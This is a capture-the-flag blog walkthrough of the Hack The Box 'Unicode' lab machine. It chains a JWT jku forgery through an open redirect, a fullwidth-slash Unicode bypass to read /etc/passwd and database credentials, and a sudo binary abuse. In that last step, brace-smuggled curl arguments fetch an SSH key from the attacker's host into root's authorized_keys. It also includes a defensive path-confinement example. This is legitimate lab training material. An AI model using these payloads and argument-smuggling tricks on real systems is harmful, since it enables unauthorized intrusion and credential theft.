Hello everyone, today we are going to walk through the Unicode machine on Hack The Box and capture both the user flag and the root flag.
ALERT:
This article is aimed at beginners working through the Hack The Box machine. If you like it, please subscribe and give it some applause.
About the Machine
The user flag relies on an open redirect vulnerability chained with the JWT jku (JWK Set URL) header to reach the admin dashboard, then a Unicode normalization bypass of a path filter (LFI, Local File Inclusion) to read credentials for a user shell. The root flag comes from abusing a binary that the user is allowed to run with sudo. So let's get started.
Enumeration:
First we start with an nmap scan to look for anything interesting:
STEP 1: nmap -sC -sV 10.10.11.126
Looking through the report you can see an SSH service and a web server whose page title is hackmedia. Let us add that name to the hosts file, /etc/hosts:
>> 10.10.11.126 hackmedia.htb
Now you can access the webpage using the domain name.
I also tried fuzzing for hidden paths, but it did not turn up anything interesting.
So let's look at that website
You can see a Register link in the top right corner.
First we register an account on that page.
Next we log in using those credentials.
I captured the login request in Burp Suite for further analysis.
In the Cookie header you can see a JWT (JSON Web Token).
Copy the encoded token and paste it into the jwt.io website to decode it.
After decoding it you can see a jku header pointing to http://hackmedia.htb/static/jwks.json
Let us check that URL.
It returns the JSON Web Key Set (JWKS): the public key the server uses to verify the token signature.
So let's download this JWKS file.
OPEN REDIRECTION VULNERABILITY:
Further analysis of the website shows that it is affected by an open redirect vulnerability.
You can see this in the image below.
First I started a Python web server on my machine.
Then I set the redirect target to my local server, and the site forwarded the request to it.
Now you can see how this will be useful.
Using this vulnerability I am going to abuse the JWT; the article below explains the technique.
Reading the article, you will learn about jku claim misuse: the server fetches its verification key from whatever URL the jku header names, so if we can make it fetch a key we control, we can sign our own tokens.
You can use the method from the article, but we are going to take the simpler route of creating a private and public key pair ourselves.
First we create the private and public keys using an online RSA key generator.
Once the key is generated, note the key size and the key name shown in the image.
Paste the private key into the token's signature settings, change the jku header and set the username claim to admin, since that is the default admin username on the website:
jku : http://hackmedia.htb/static/jwks.json/./../redirect/?url=<attacker.ip>/jwks.json
The jku still begins with the trusted URL http://hackmedia.htb/static/jwks.json, which apparently satisfies the server's check, but the ./../ part walks over to the redirect endpoint, which forwards the key lookup to our server.
Next we need to change the n (modulus) value in the JWKS file so that it matches the key pair we generated.
First download the jwks.json file using the command below:
STEP 2: wget http://hackmedia.htb/static/jwks.json
In the file, n is the RSA modulus and e is the public exponent.
Replace the n value with the modulus of the key pair we generated earlier (the JWK modulus is base64url-encoded, so keep the same encoding as the original file).
So now I have changed the n value.
Next, start the Python web server that will serve the modified jwks.json:
STEP 3: python3 -m http.server 80
Note: use the same port that you put in the jku URL of the token, otherwise the server will not be able to fetch the key.
Copy the forged JWT and paste it into the cookie using a cookie editor.
Boom!
Now you will get the admin dashboard.
From the admin dashboard, click the Last Quarter tab.
You will land on this page:
NORMALIZATION OF UNICODE:
Further analysis of this page shows that it is affected by LFI (Local File Inclusion).
For background on the technique, read https://lazarv.com/posts/unicode-normalization-vulnerabilities/
I captured the request in Burp Suite for further analysis.
I found that the application was blocking the / character.
So I googled for a bypass and found another interesting article.
The image shows an interesting Unicode character: the fullwidth solidus (U+FF0F, which URL-encodes as %ef%bc%8f in UTF-8). The filter does not see it as a slash, but the application presumably normalizes it (NFKC) to a regular / afterwards. Let's try it!
It works, so replace every / with %ef%bc%8f.
Use the encoded character five times to climb out of the application directory:
STEP 4: GET /display/?page=..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fetc%ef%bc%8fpasswd
Boom! Now you will get the password file.
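Here is an added example (not the target's code) showing why the fullwidth solidus gets past the filter, and how to resolve a page parameter so that it cannot. The vulnerable function mimics what we observed: a denylist rejects / in the raw value, the value is NFKC-normalized afterwards, and U+FF0F normalizes to a plain slash. The hardened version normalizes first and then checks that the resolved path stays inside the template directory instead of trying to enumerate bad characters. The template directory and the URL-encoded parameter are assumptions for the demo.

```python
# Added example, not code from the target application.
import os
import posixpath
import unicodedata
from typing import Optional, Set
from urllib.parse import unquote

BASE = "/var/www/hackmedia/templates"     # assumption: the app's template directory
PAYLOAD = ("..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f"
           "etc%ef%bc%8fpasswd")           # STEP 4 from the walkthrough


def vulnerable_resolve(page: str) -> Optional[str]:
    """Filter first, normalize second: the order that makes this exploitable."""
    raw = unquote(page)                        # %ef%bc%8f -> U+FF0F FULLWIDTH SOLIDUS
    if "/" in raw or "\\" in raw:              # denylist sees no ASCII slash
        return None
    page = unicodedata.normalize("NFKC", raw)  # ...and now every U+FF0F is "/"
    return posixpath.normpath(posixpath.join(BASE, page))


def hardened_resolve(page: str) -> Optional[str]:
    """Normalize and decode before any check, then confine the resolved path to BASE."""
    page = unicodedata.normalize("NFKC", unquote(page))
    root = os.path.realpath(BASE)
    full = os.path.realpath(os.path.join(root, page))  # an absolute page discards root
    if os.path.commonpath([root, full]) != root:       # escaped the directory
        return None
    return full


def nfkc_aliases_of(ch: str) -> Set[str]:
    """Every code point whose NFKC form is ch: what a denylist would have to cover.
    Surrogates are skipped because they are not valid scalar values."""
    return {chr(cp) for cp in range(0x110000)
            if not 0xD800 <= cp <= 0xDFFF and cp != ord(ch)
            and unicodedata.normalize("NFKC", chr(cp)) == ch}
```

`vulnerable_resolve(PAYLOAD)` returns /etc/passwd, while the same payload, an absolute path, or a single ../ step all come back as None from `hardened_resolve`. `nfkc_aliases_of("/")` lists the characters a slash denylist would need to know about, which is the practical argument for checking the resolved path rather than the input characters.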
Next I checked /proc/self/environ and found that the application runs as the user code.
Then I tried /proc/self/cmdline and found that the running Python file is app.
After a few more tries I read /proc/self/cwd/app.py.
Looking through the code, it loads the MySQL database credentials from a db_yaml file.
So let us try /proc/self/cwd/db_yaml
Now you can see the username and password:
username = code, password = B3stC0d3r2021@@!
Let us try this username and password over SSH, since the SSH port is open (you can see it in the nmap report).
Boom!
Now you have the user flag, user.txt.
ROOT FLAG:
sudo binary abuse
STEP 5: sudo -l
This shows a binary we are allowed to run as root, so run it with sudo:
STEP 6: sudo /usr/bin/treport
I chose option 3 and entered the file name file://etc/passwd (note that with only two slashes, etc is parsed as a host name; the correct form is file:///etc/passwd).
It looked as if the binary passes the input to a command with a blacklist, so I tried some ideas for getting around it (commas, dots, colons, pipes, etc.).
Boom!
It works!
I tried a lot of inputs; after a long time I found that changing the case of the scheme slips past the filter, which apparently only matches file:// in lower case:
FiLe:///etc/passwd
Now you get the file contents. Next, choose the second option (highlighted in the image).
Next I am going to create an SSH key so we can log in as root over SSH.
Run these commands on your local machine:
STEP 7: ssh-keygen -f root
STEP 8: cat root.pub
Copy the public key and paste it into a new file named authorized_key.
Then start your Python web server:
STEP 9: python3 -m http.server 80
Now enter the following as the URL in treport:
STEP 10 : {http://10.10.14.103/authorized_key,-o,/root/.ssh/authorized_keys}
The braces smuggle the -o flag and a destination path to the download tool (curl, judging by the -o syntax) without typing a space, so it fetches our public key and saves it as /root/.ssh/authorized_keys.
Next we log in over SSH using the private key we generated, which is named root:
STEP 11: ssh -i root root@hackmedia.htb
Oh yeah!
Now you have a root shell.
STEP 12: cat root.txt
Boom!
Now you can see the root flag.
I hope you found this article useful. If you liked it, please subscribe to my blog and give it some applause, which motivates me to publish more articles and walkthroughs.
And if you want to support me for the OSCP exam, please donate.